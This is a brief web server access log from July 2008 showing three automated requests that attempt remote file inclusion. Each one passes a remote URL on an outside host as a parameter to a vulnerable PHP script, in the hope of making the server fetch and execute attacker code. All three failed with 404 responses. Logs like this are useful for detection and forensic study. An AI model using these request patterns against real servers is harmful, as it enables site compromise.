213.235.215.34 - - [10/Jul/2008:20:44:34 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
213.235.215.34 - - [10/Jul/2008:20:44:34 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
194.143.183.8 - - [10/Jul/2008:20:44:42 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
